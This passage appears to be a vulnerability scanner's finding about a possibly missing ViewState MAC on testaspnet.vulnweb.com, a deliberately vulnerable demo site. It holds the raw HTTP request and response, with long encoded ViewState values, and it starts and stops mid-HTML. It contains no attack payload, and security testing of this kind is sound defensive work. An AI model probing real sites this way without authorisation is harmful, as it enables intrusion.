style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (456 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 Content-Length: 10985 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (10985 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ944e4UqgWJpySuZGYD9y7m9ZXo%2FQ%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 30486Response body (30486 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb